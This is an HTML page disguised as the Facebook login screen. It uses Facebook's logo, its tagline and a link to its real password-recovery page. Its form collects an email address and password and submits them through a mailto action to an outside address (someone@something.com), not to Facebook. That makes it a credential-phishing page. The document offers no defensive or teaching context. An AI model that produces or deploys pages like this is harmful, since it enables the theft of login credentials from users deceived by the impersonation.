<!DOCTYPE html>
<html>
    <head>
        <title>Facebook - log in</title>
        <style>
            body{
                background-color: whitesmoke;
            }
            #pad{
                margin-left: 50%;
                margin-top: 10%;
                text-align:center;
                width: 400px;
                height: 300px; 
                background-color: white;
                padding-top: 2%;
                border-radius: 2%;
            }
            input{
                border-radius: 5%;
            }
            #image{
                margin-top: -20%;
                margin-left: 18%;
            }

        </style>
    </head>
    <body>
        
            
            <div id=pad>
                <form action="mailto:someone@something.com" method="post">
                <input type="email" style="width: 300px;height: 40px;border-color:whitesmoke; border-radius: 10%;" name="email" placeholder="Enter email address" required>
                <br><br>
                <input type="password" style="width: 300px;height: 40px;border-color: whitesmoke;" name="password" placeholder="Enter your password" required>
                <br><br>
                <input type="submit" style="background-color: rgb(45, 126, 219);color: white;width: 300px;height: 50px;border-color: white;" name="Log In" value="Log In">
                <br><br>
                <a  style="color: blue;" href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" target="
                _blank">Forgot Password</a>
                <br><br>
                <input type="button" style="background-color:rgb(88, 156, 21);color:white;width: 200px;height: 40px;" value="Create New Account">
            </form>
            </div>
            <div id="image">
                <img style=width:300px;" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg">
            </div>
            <h2 style="margin-left: 20%;font-family:Arial, Helvetica, sans-serif ;font-weight: lighter;">Facebook helps you connect and share <br>with the people in your life.</h2>
            <br><br><br><br><br><br>
            <pre style="font-family: Arial, Helvetica, sans-serif;text-size;" >
                                                                                                                                                                                    Create a Page for a celebrity, brand or business.
        </pre>
           
        
    </body>
</html>